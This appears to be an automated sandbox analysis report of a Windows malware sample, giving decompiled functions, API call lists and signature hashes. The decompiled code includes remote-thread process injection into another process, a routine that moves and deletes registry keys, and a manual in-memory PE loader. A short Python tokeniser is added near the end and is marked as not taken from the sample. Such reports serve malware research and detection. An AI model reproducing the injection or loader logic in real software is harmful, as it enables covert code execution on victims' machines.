                                    • Instruction Fuzzy Hash: D411B630931619ABF722D761CD51B8DBEA9AF55B14F8080B0F508E6144EAB0AFC54B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 56%
                                    			E24054028(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				_Unknown_base(*)()* _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				void* _t22;
                                    				void* _t30;
                                    				intOrPtr _t37;
                                    				void* _t40;
                                    				void* _t43;
                                    
                                    				_t30 = __ecx;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_v8 = __edx;
                                    				_t40 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t43);
                                    				_push(0x240540c6);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t43 + 0xfffffff0;
                                    				_v12 = GetProcAddress(GetModuleHandleA("kernel32"), "Sleep");
                                    				_v20 = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
                                    				_v16 = E24053EC0(_t40, 0, _t30, E24013534(_v8), __edi, _t40);
                                    				_t22 = E24053F80(_t40,  &_v20, E24053FF4, 0, 0xc);
                                    				if(_t22 != 0) {
                                    					CloseHandle(_t22);
                                    				}
                                    				_pop(_t37);
                                    				 *[fs:eax] = _t37;
                                    				_push(0x240540cd);
                                    				return E24013088( &_v8);
			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,240540C6), ref: 24054057
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 2405405D
                                    • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,240540C6), ref: 2405406F
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 24054075
                                      • Part of subcall function 24053EC0: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,24053F3E,?,?,?,?,00000000,00000000,00000000), ref: 24053EFC
                                      • Part of subcall function 24053EC0: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,24053F3E), ref: 24053F1E
                                      • Part of subcall function 24053F80: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 24053FBE
                                      • Part of subcall function 24053F80: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000,00000000,?), ref: 24053FCE
                                      • Part of subcall function 24053F80: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF,?,00000000,00000000,00000000,00000000,00000000,?), ref: 24053FE1
                                    • CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,240540C6), ref: 240540A9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
• Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
• Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$AddressMemoryModuleProcProcess$AllocCloseCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID: LoadLibraryA$Sleep$kernel32
                                    • API String ID: 3487503967-1813742806
                                    • Opcode ID: 96c1c77a0d73dfc248054957a63184b67722f0d05caed2d4221e70270262d7ee
                                    • Instruction ID: 72346669d51578b8918a52779afd203ad565dfc0c6728f4199af936b9efb8cda
                                    • Opcode Fuzzy Hash: 96c1c77a0d73dfc248054957a63184b67722f0d05caed2d4221e70270262d7ee
                                    • Instruction Fuzzy Hash: 08019270A00204BFFB11EBB58C91B9EBAECFF14244BA04564F404F72A9DA709F948B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E2402BDD4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                    				void* _v8;
                                    				char _v9;
                                    				int _v16;
                                    				int _v20;
                                    				int _v24;
                                    				char _v28;
                                    				char* _v32;
                                    				void* _v36;
                                    				void* _v40;
                                    				long _t88;
                                    				long _t89;
                                    				intOrPtr _t95;
                                    				void* _t101;
                                    				void* _t103;
                                    				void* _t104;
                                    				intOrPtr _t105;
                                    				void* _t106;
                                    
                                    				_t106 = __eflags;
                                    				_t103 = _t104;
                                    				_t105 = _t104 + 0xffffffdc;
                                    				_v28 = 0;
                                    				_v8 = __edx;
                                    				_t101 = __eax;
                                    				_push(_t103);
                                    				_push(0x2402bf60);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t105;
                                    				_v9 = 0;
                                    				E240136BC( &_v28, 0x200);
                                    				_v32 = E2402BDB4(0x2000, 0x200, _t106);
                                    				_push(_t103);
                                    				_push(0x2402bf43);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t105;
                                    				do {
                                    					_v16 = 0x200;
                                    					_v20 = 0x2000;
                                    					_t88 = RegEnumValueA(_t101, 0, E24013534(_v28),  &_v16, 0,  &_v24, _v32,  &_v20);
                                    					if(_t88 == 0) {
                                    						_t88 = RegSetValueExA(_v8, E24013534(_v28), 0, _v24, _v32, _v20);
                                    						RegDeleteValueA(_t101, E24013534(_v28));
                                    					}
                                    				} while (_t88 == 0);
                                    				do {
                                    					_v16 = 0x200;
                                    					_v20 = 0x2000;
                                    					_t89 = RegEnumKeyExA(_t101, 0, E24013534(_v28),  &_v16, 0, _v32,  &_v20, 0);
                                    					if(_t89 == 0) {
                                    						_t89 = RegCreateKeyA(_v8, E24013534(_v28),  &_v36);
                                    						if(_t89 == 0) {
                                    							_t89 = RegCreateKeyA(_t101, E24013534(_v28),  &_v40);
                                    							_t113 = _t89;
                                    							if(_t89 == 0) {
                                    								E2402BDD4(_v40, _t89, _v36, 0, _t101, _t113);
                                    								RegCloseKey(_v40);
                                    								RegDeleteKeyA(_t101, E24013534(_v28));
                                    							}
                                    							RegCloseKey(_v36);
                                    						}
                                    					}
                                    				} while (_t89 == 0);
                                    				_pop(_t95);
                                    				 *[fs:eax] = _t95;
                                    				_push(0x2402bf4a);
                                    				return E2401135C(_v32);
                                    			}

                                    0x2402bdd4
                                    0x2402bdd5
                                    0x2402bdd7
                                    0x2402bddf
                                    0x2402bde2
                                    0x2402bde5
                                    0x2402bde9
                                    0x2402bdea
                                    0x2402bdef
                                    0x2402bdf2
                                    0x2402bdf5
                                    0x2402be01
                                    0x2402be10
                                    0x2402be15
                                    0x2402be16
                                    0x2402be1b
                                    0x2402be1e
                                    0x2402be23
                                    0x2402be23
                                    0x2402be2a
                                    0x2402be53
                                    0x2402be57
                                    0x2402be79
                                    0x2402be85
                                    0x2402be85
                                    0x2402be8a
                                    0x2402be90
                                    0x2402be90
                                    0x2402be97
                                    0x2402bebe
                                    0x2402bec2
                                    0x2402beda
                                    0x2402bede
                                    0x2402bef3
                                    0x2402bef5
                                    0x2402bef7
                                    0x2402beff
                                    0x2402bf08
                                    0x2402bf17
                                    0x2402bf17
                                    0x2402bf20
                                    0x2402bf20
                                    0x2402bede
                                    0x2402bf25
                                    0x2402bf2f
                                    0x2402bf32
                                    0x2402bf35
                                    0x2402bf42

                                    APIs
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,00000200,00000000,?,?,00002000,00000000,2402BF43,?,00000000,2402BF60), ref: 2402BE4E
                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,?,?,00002000,?,00000000,00000000,00000200,00000000,?,?,00002000,00000000,2402BF43), ref: 2402BE74
                                    • RegDeleteValueA.ADVAPI32(?,00000000,?,00000000,00000000,?,?,00002000,?,00000000,00000000,00000200,00000000,?,?,00002000), ref: 2402BE85
                                    • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,00000200,00000000,?,00002000,00000000,?,00000000,00000000,00000200,00000000,?,?,00002000), ref: 2402BEB9
                                    • RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 2402BED5
                                    • RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 2402BEEE
                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000200,00000000,?,00002000,00000000), ref: 2402BF08
                                    • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 2402BF17
                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000200,00000000,?,00002000,00000000), ref: 2402BF20
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Value$CloseCreateDeleteEnum
                                    • String ID:
                                    • API String ID: 925550085-0
                                    • Opcode ID: 9085b32d7381c6fe84ccec4be7364d85f474614d88883a8a8d7b5b0c79758269
                                    • Instruction ID: fcb5525d51d3c2b823e6a7df952a23a35f130870d7d0118232396dd24fb46ee7
                                    • Opcode Fuzzy Hash: 9085b32d7381c6fe84ccec4be7364d85f474614d88883a8a8d7b5b0c79758269
                                    • Instruction Fuzzy Hash: C941FCB1A00609AFEB41DEE9CD90FAFBBFCEB19204F404064E614E7254DA749A418BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E24023A08(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                    				char _v5;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				struct HINSTANCE__* _v20;
                                    				char _v276;
                                    				char _v278;
                                    				char _v284;
                                    				intOrPtr* _t54;
                                    				char* _t71;
                                    				signed int _t73;
                                    				char* _t75;
                                    				char* _t78;
                                    				char* _t80;
                                    				char* _t105;
                                    				char* _t106;
                                    				intOrPtr _t113;
                                    				intOrPtr _t123;
                                    				intOrPtr _t125;
                                    				char** _t126;
                                    				void* _t129;
                                    				intOrPtr _t130;
                                    
                                    				_t130 = _t129 + 0xfffffee8;
                                    				_v284 = 0;
                                    				_t123 = _a4;
                                    				_push(_t129);
                                    				_push(0x24023bd1);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t130;
                                    				_v5 = 1;
                                    				_v12 =  *((intOrPtr*)(_t123 + 4));
                                    				_t54 = E24023858(_t123, 1);
                                    				if( *((intOrPtr*)(_t54 + 4)) <= 0) {
                                    					L21:
                                    					_pop(_t113);
                                    					 *[fs:eax] = _t113;
                                    					_push(0x24023bd8);
                                    					return E24013088( &_v284);
                                    				}
                                    				_v16 =  *_t54 + _v12;
                                    				while(IsBadHugeReadPtr(_v16, 0x14) == 0 &&  *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                    					_t125 = _v12;
                                    					_v20 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _t125);
                                    					__eflags = _v20 - 0xffffffff;
                                    					if(_v20 != 0xffffffff) {
                                    						__eflags =  *(_t123 + 8);
                                    						if(__eflags == 0) {
                                    							 *(_t123 + 8) = E240239C4(1, _t116, __eflags);
                                    						}
                                    						_t71 = E24014B40( *(_t123 + 8),  *(_t123 + 0xc) + 1 << 2);
                                    						_t130 = _t130 + 8;
                                    						_t105 = _t71;
                                    						 *(_t123 + 8) = _t105;
                                    						__eflags = _t105;
                                    						if(_t105 != 0) {
                                    							_t73 =  *(_t123 + 0xc) << 2;
                                    							 *(_t123 + 8) =  &(( *(_t123 + 8))[_t73]);
                                    							 *( *(_t123 + 8)) = _v20;
                                    							 *(_t123 + 8) =  *(_t123 + 8) - _t73;
                                    							 *(_t123 + 0xc) =  *(_t123 + 0xc) + 1;
                                    							_t75 =  *_v16;
                                    							__eflags = _t75;
                                    							if(_t75 == 0) {
                                    								_t78 =  *((intOrPtr*)(_v16 + 0x10)) + _t125;
                                    								_t106 = _t78;
                                    								_t126 = _t78;
                                    							} else {
                                    								_t106 =  &(_t75[_t125]);
                                    								_t126 =  *((intOrPtr*)(_v16 + 0x10)) + _t125;
                                    							}
                                    							while(1) {
                                    								__eflags =  *_t106;
                                    								if( *_t106 == 0) {
                                    									break;
                                    								}
                                    								_push( *_t106);
                                    								_t80 = E2402387C( *_t106);
                                    								__eflags = _t80;
                                    								if(_t80 == 0) {
                                    									_t116 = _v12 +  *_t106;
                                    									__eflags = _v12 +  *_t106;
                                    									E24015460( &_v278, _v12 +  *_t106);
                                    									 *_t126 = GetProcAddress(_v20,  &_v276);
                                    								} else {
                                    									 *_t126 = GetProcAddress(_v20, E2402386C( *_t106) & 0x0000ffff);
                                    								}
                                    								__eflags =  *_t126;
                                    								if( *_t126 != 0) {
                                    									_t126 =  &(_t126[1]);
                                    									_t106 =  &(_t106[4]);
                                    									__eflags = _t106;
                                    									continue;
                                    								} else {
                                    									_t116 = "BuildImportTable: GetProcAddress failed";
                                    									E240130DC(0x2405bb68, "BuildImportTable: GetProcAddress failed");
                                    									_v5 = 0;
                                    									break;
                                    								}
                                    							}
                                    							_t45 =  &_v16;
                                    							 *_t45 = _v16 + 0x14;
                                    							__eflags =  *_t45;
                                    							continue;
                                    						} else {
                                    							E240130DC(0x2405bb68, "BuildImportTable: ReallocMemory failed");
                                    							_v5 = 0;
                                    							goto L21;
                                    						}
                                    					}
                                    					E24013274( &_v284,  *((intOrPtr*)(_v16 + 0xc)) + _t125);
                                    					E24013388(0x2405bb68, _v284, "BuildImportTable: can\'t load library: ");
                                    					_v5 = 0;
                                    					goto L21;
                                    				}
                                    				goto L21;
                                    			}

                                    0x24023a0b
                                    0x24023a16
                                    0x24023a1c
                                    0x24023a21
                                    0x24023a22
                                    0x24023a27
                                    0x24023a2a
                                    0x24023a2d
                                    0x24023a34
                                    0x24023a3a
                                    0x24023a43
                                    0x24023bb8
                                    0x24023bba
                                    0x24023bbd
                                    0x24023bc0
                                    0x24023bd0
                                    0x24023bd0
                                    0x24023a4e
                                    0x24023b9c
                                    0x24023a5c
                                    0x24023a67
                                    0x24023a6a
                                    0x24023a6e
                                    0x24023aa1
                                    0x24023aa5
                                    0x24023ab1
                                    0x24023ab1
                                    0x24023ac0
                                    0x24023ac5
                                    0x24023ac8
                                    0x24023aca
                                    0x24023acd
                                    0x24023acf
                                    0x24023aec
                                    0x24023aef
                                    0x24023af8
                                    0x24023afa
                                    0x24023afd
                                    0x24023b03
                                    0x24023b05
                                    0x24023b07
                                    0x24023b1f
                                    0x24023b21
                                    0x24023b23
                                    0x24023b09
                                    0x24023b0b
                                    0x24023b15
                                    0x24023b15
                                    0x24023b93
                                    0x24023b93
                                    0x24023b96
                                    0x00000000
                                    0x00000000
                                    0x24023b29
                                    0x24023b2a
                                    0x24023b2f
                                    0x24023b31
                                    0x24023b4f
                                    0x24023b4f
                                    0x24023b5c
                                    0x24023b71
                                    0x24023b33
                                    0x24023b48
                                    0x24023b48
                                    0x24023b73
                                    0x24023b76
                                    0x24023b8d
                                    0x24023b90
                                    0x24023b90
                                    0x00000000
                                    0x24023b78
                                    0x24023b7d
                                    0x24023b82
                                    0x24023b87
                                    0x00000000
                                    0x24023b87
                                    0x24023b76
                                    0x24023b98
                                    0x24023b98
                                    0x24023b98
                                    0x00000000
                                    0x24023ad1
                                    0x24023adb
                                    0x24023ae0
                                    0x00000000
                                    0x24023ae0
                                    0x24023acf
                                    0x24023a7e
                                    0x24023a93
                                    0x24023a98
                                    0x00000000
                                    0x24023a98
                                    0x00000000

                                    APIs
                                    • LoadLibraryA.KERNEL32(00000000,?,00000001,00000000,24023BD1,?,00000000,?,00000000,?,24023F76,?,00004550,00004550,?,00000000), ref: 24023A62
                                    • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 24023BA2
                                    Strings
                                    • BuildImportTable: GetProcAddress failed, xrefs: 24023B7D
                                    • BuildImportTable: ReallocMemory failed, xrefs: 24023AD6
                                    • BuildImportTable: can't load library: , xrefs: 24023A8E
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: HugeLibraryLoadRead
                                    • String ID: BuildImportTable: GetProcAddress failed$BuildImportTable: ReallocMemory failed$BuildImportTable: can't load library:
                                    • API String ID: 571923069-1384308123
                                    • Opcode ID: c9af83cfdb07119b580fb341aa8766670f975d331066348f60fd3a040ad83ddc
                                    • Instruction ID: edea111201dcdaddfe67d25f0df0f405e4b5c8f94fac960227cb88b7f2e2cca9
                                    • Opcode Fuzzy Hash: c9af83cfdb07119b580fb341aa8766670f975d331066348f60fd3a040ad83ddc
                                    • Instruction Fuzzy Hash: 71511F70A04619AFDB01CFA8C880B9DF7F4FF19314F4485A5D518EB285D7B4EAC58B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 46%
                                    			E2402DD70(void* __eax, void* __ecx, void* __edx, void* __eflags) {
                                    				char _v8;
                                    				char _v408;
                                    				intOrPtr* _t10;
                                    				char _t13;
                                    				intOrPtr* _t14;
                                    				void* _t20;
                                    				intOrPtr* _t22;
                                    				intOrPtr _t29;
                                    				void* _t36;
                                    				void* _t38;
                                    				intOrPtr _t39;
                                    				void* _t41;
                                    
                                    				_t41 = __eflags;
                                    				_t36 = _t38;
                                    				_t39 = _t38 + 0xfffffe6c;
                                    				_t20 = __eax;
                                    				E240130DC(__edx, __eax);
                                    				E24013480(_t20, "127.0.0.1");
                                    				if(_t41 != 0) {
                                    					_t10 =  &_v408;
                                    					_push(_t10);
                                    					_push(0x101);
                                    					L240225F0();
                                    					__eflags = _t10;
                                    					if(_t10 != 0) {
                                    						goto L8;
                                    					} else {
                                    						_push(_t36);
                                    						_push(0x2402de18);
                                    						_push( *[fs:eax]);
                                    						 *[fs:eax] = _t39;
                                    						_t13 = E24013534(_t20);
                                    						_push(_t13);
                                    						L24022590();
                                    						_v8 = _t13;
                                    						__eflags = _v8 - 0xffffffff;
                                    						if(_v8 != 0xffffffff) {
                                    							_push(2);
                                    							_push(4);
                                    							_t14 =  &_v8;
                                    							_push(_t14);
                                    							L240225D8();
                                    							_t22 = _t14;
                                    							__eflags = _t22;
                                    							if(_t22 != 0) {
                                    								E24013274(__edx,  *_t22);
                                    							}
                                    							__eflags = 0;
                                    							_pop(_t29);
                                    							 *[fs:eax] = _t29;
                                    							_push(0x2402de1f);
                                    							L240225F8();
                                    							return 0;
                                    						} else {
                                    							L240225F8();
                                    							_t10 = E24012BE8();
                                    							goto L8;
                                    						}
                                    					}
                                    				} else {
                                    					_t10 = E240130DC(__edx, "localhost");
                                    					L8:
                                    					return _t10;
                                    				}
                                    			}

                                    0x2402dd70
                                    0x2402dd71
                                    0x2402dd73
                                    0x2402dd7d
                                    0x2402dd83
                                    0x2402dd8f
                                    0x2402dd94
                                    0x2402dda4
                                    0x2402ddaa
                                    0x2402ddab
                                    0x2402ddb0
                                    0x2402ddb5
                                    0x2402ddb7
                                    0x00000000
                                    0x2402ddb9
                                    0x2402ddbb
                                    0x2402ddbc
                                    0x2402ddc1
                                    0x2402ddc4
                                    0x2402ddc9
                                    0x2402ddce
                                    0x2402ddcf
                                    0x2402ddd4
                                    0x2402ddd7
                                    0x2402dddb
                                    0x2402dde9
                                    0x2402ddeb
                                    0x2402dded
                                    0x2402ddf0
                                    0x2402ddf1
                                    0x2402ddf6
                                    0x2402ddf8
                                    0x2402ddfa
                                    0x2402de00
                                    0x2402de00
                                    0x2402de05
                                    0x2402de07
                                    0x2402de0a
                                    0x2402de0d
                                    0x2402de12
                                    0x2402de17
                                    0x2402dddd
                                    0x2402dddd
                                    0x2402dde2
                                    0x00000000
                                    0x2402dde2
                                    0x2402dddb
                                    0x2402dd96
                                    0x2402dd9d
                                    0x2402de1f
                                    0x2402de24
                                    0x2402de24

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CleanupStartupinet_addr
                                    • String ID: 127.0.0.1$localhost
                                    • API String ID: 4189620951-2339935011
                                    • Opcode ID: 9630872b9d404b1588947f769f6fd1fe7d4285b669600158c76a668d7c0332c3
                                    • Instruction ID: c260ce3db4f5fda0700de2230fbaf203c900a44598fe2e56bc850e46d608601e
                                    • Opcode Fuzzy Hash: 9630872b9d404b1588947f769f6fd1fe7d4285b669600158c76a668d7c0332c3
                                    • Instruction Fuzzy Hash: C3110831704E145BFF41FAF84C9099A72DC9F6C618B5085B7E61CD72C9E9B0CED04292
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E240114F4(CHAR* __eax, intOrPtr* __edx) {
                                    				char _t5;
                                    				char _t6;
                                    				CHAR* _t7;
                                    				char _t9;
                                    				CHAR* _t11;
                                    				char _t14;
                                    				CHAR* _t15;
                                    				char _t17;
                                    				CHAR* _t19;
                                    				CHAR* _t22;
                                    				CHAR* _t23;
                                    				CHAR* _t32;
                                    				intOrPtr _t33;
                                    				intOrPtr* _t34;
                                    				void* _t35;
                                    				void* _t36;
                                    
                                    				_t34 = __edx;
                                    				_t22 = __eax;
                                    				while(1) {
                                    					L2:
                                    					_t5 =  *_t22;
                                    					if(_t5 != 0 && _t5 <= 0x20) {
                                    						_t22 = CharNextA(_t22);
                                    					}
                                    					L2:
                                    					_t5 =  *_t22;
                                    					if(_t5 != 0 && _t5 <= 0x20) {
                                    						_t22 = CharNextA(_t22);
                                    					}
                                    					L4:
                                    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
                                    						_t36 = 0;
                                    						_t32 = _t22;
                                    						while(1) {
                                    							_t6 =  *_t22;
                                    							if(_t6 <= 0x20) {
                                    								break;
                                    							}
                                    							if(_t6 != 0x22) {
                                    								_t7 = CharNextA(_t22);
                                    								_t36 = _t36 + _t7 - _t22;
                                    								_t22 = _t7;
                                    								continue;
                                    							}
                                    							_t22 = CharNextA(_t22);
                                    							while(1) {
                                    								_t9 =  *_t22;
                                    								if(_t9 == 0 || _t9 == 0x22) {
                                    									break;
                                    								}
                                    								_t11 = CharNextA(_t22);
                                    								_t36 = _t36 + _t11 - _t22;
                                    								_t22 = _t11;
                                    							}
                                    							if( *_t22 != 0) {
                                    								_t22 = CharNextA(_t22);
                                    							}
                                    						}
                                    						E240136BC(_t34, _t36);
                                    						_t23 = _t32;
                                    						_t33 =  *_t34;
                                    						_t35 = 0;
                                    						while(1) {
                                    							_t14 =  *_t23;
                                    							if(_t14 <= 0x20) {
                                    								break;
                                    							}
                                    							if(_t14 != 0x22) {
                                    								_t15 = CharNextA(_t23);
                                    								if(_t15 <= _t23) {
                                    									continue;
                                    								} else {
                                    									goto L27;
                                    								}
                                    								do {
                                    									L27:
                                    									 *((char*)(_t33 + _t35)) =  *_t23;
                                    									_t23 =  &(_t23[1]);
                                    									_t35 = _t35 + 1;
                                    								} while (_t15 > _t23);
                                    								continue;
                                    							}
                                    							_t23 = CharNextA(_t23);
                                    							while(1) {
                                    								_t17 =  *_t23;
                                    								if(_t17 == 0 || _t17 == 0x22) {
                                    									break;
                                    								}
                                    								_t19 = CharNextA(_t23);
                                    								if(_t19 <= _t23) {
                                    									continue;
                                    								} else {
                                    									goto L21;
                                    								}
                                    								do {
                                    									L21:
                                    									 *((char*)(_t33 + _t35)) =  *_t23;
                                    									_t23 =  &(_t23[1]);
                                    									_t35 = _t35 + 1;
                                    								} while (_t19 > _t23);
                                    							}
                                    							if( *_t23 != 0) {
                                    								_t23 = CharNextA(_t23);
                                    							}
                                    						}
                                    						return _t23;
                                    					} else {
                                    						_t22 =  &(_t22[2]);
                                    						continue;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • CharNextA.USER32(00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D,?,?,00000000,00000000), ref: 2401152B
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D,?,?,00000000), ref: 24011535
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D,?,?,00000000), ref: 24011552
                                    • CharNextA.USER32(00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D,?,?,00000000,00000000), ref: 2401155C
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D,?,?,00000000), ref: 24011585
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D), ref: 2401158F
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D), ref: 240115B3
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D,?,?,00000000), ref: 240115BD
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CharNext
                                    • String ID:
                                    • API String ID: 3213498283-0
                                    • Opcode ID: 53bc9808c7aaaf10bef2a0b4c7be660ee445fb4df034681d114db59d401db64d
                                    • Instruction ID: 2418bc85b3e5b7a2e25b13f35f6629efb46af35bd37b1afb5207f217da1fe5a5
                                    • Opcode Fuzzy Hash: 53bc9808c7aaaf10bef2a0b4c7be660ee445fb4df034681d114db59d401db64d
                                    • Instruction Fuzzy Hash: 0221B489B48394DAEB2F39F868C07597BCA4B5F04875414B5D58FCF20BE4A08DD6C366
                                    Uniqueness

                                    Uniqueness Score: -1.00%
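The two CharNextA loops in the listing above measure and then copy one command-line token. The Python below is an added example, not code from the sample or from the report: it reproduces the quoting rules visible in those loops so an analyst can predict how the sample tokenises a command line it is started with. The leading-blank skip at the top of the routine is not part of the listing and is assumed from Delphi's System.GetParamStr, which these loops resemble; sample inputs are constructed.

```python
"""Token rules as read from the CharNextA loops: a token ends at the first
byte <= 0x20 outside quotes; '"' opens a run that continues, blanks
included, up to the next '"' or NUL; the quote characters are dropped.
There are no backslash escapes, unlike CommandLineToArgvW."""
from __future__ import annotations


def next_token(cmdline: str, pos: int) -> tuple[str, int]:
    """Return (token, position just after it), scanning from pos."""
    n = len(cmdline)
    # assumed (not in the listing): leading bytes <= 0x20 are skipped
    while pos < n and ord(cmdline[pos]) <= 0x20:
        pos += 1
    out: list[str] = []
    while pos < n and ord(cmdline[pos]) > 0x20:      # outer loop: c > 0x20
        if cmdline[pos] != '"':
            out.append(cmdline[pos])                  # plain byte copied as-is
            pos += 1
            continue
        pos += 1                                      # drop the opening quote
        while pos < n and cmdline[pos] != '"':        # inner loop: until '"' or NUL
            out.append(cmdline[pos])                  # blanks survive inside quotes
            pos += 1
        if pos < n:                                   # if *p != 0: skip closing quote
            pos += 1
    return "".join(out), pos


def split_params(cmdline: str) -> list[str]:
    """Tokenise a whole command line with the rules of next_token."""
    params: list[str] = []
    pos, n = 0, len(cmdline)
    while True:
        # skip blanks here so an empty '""' token is not confused with end of input
        while pos < n and ord(cmdline[pos]) <= 0x20:
            pos += 1
        if pos >= n:
            return params
        tok, pos = next_token(cmdline, pos)
        params.append(tok)
```

Note that a quote in the middle of a token is absorbed rather than treated as a delimiter, so `a"b c"d` is one parameter, `ab cd`; a tab or any other control character outside quotes ends a token just as a space does.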

                                    C-Code - Quality: 87%
                                    			E2403F494(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
                                    				char _v5;
                                    				char _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				intOrPtr _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				char _v100;
                                    				void* _t20;
                                    				intOrPtr _t33;
                                    				intOrPtr _t34;
                                    				intOrPtr _t40;
                                    				void* _t53;
                                    				void* _t54;
                                    				char _t60;
                                    				intOrPtr _t61;
                                    				intOrPtr _t66;
                                    				intOrPtr _t67;
                                    				struct HWND__* _t69;
                                    				void* _t73;
                                    				void* _t74;
                                    				intOrPtr _t75;
                                    
                                    				_t60 = __edx;
                                    				_t54 = __ecx;
                                    				_t73 = _t74;
                                    				_t75 = _t74 + 0xffffffa0;
                                    				if(__edx != 0) {
                                    					_t75 = _t75 + 0xfffffff0;
                                    					_t20 = E24012898(_t20, _t73);
                                    				}
                                    				_v5 = _t60;
                                    				_t53 = _t20;
                                    				_t61 =  *0x2403f17c; // 0x2403f180
                                    				E240139CC( &_v100, _t61);
                                    				 *[fs:eax] = _t75;
                                    				E2403E814(_t54, 0);
                                    				 *((intOrPtr*)( *_t53 + 4))( *[fs:eax], 0x2403f587, _t73);
                                    				_t33 =  *0x2405aa58; // 0x190
                                    				_t34 =  *0x2405b67c; // 0x24010000
                                    				E24013534(_v100);
                                    				_t69 = E240154D4(_v92,  &_v72, 0, _t34, _t33, _t54, _v76, _v80, _v84, _v88, _v96);
                                    				 *(_t53 + 0xc) = _t69;
                                    				if(IsWindow(_t69) != 0) {
                                    					SetPropA( *(_t53 + 0xc), "OBJECT", _t53);
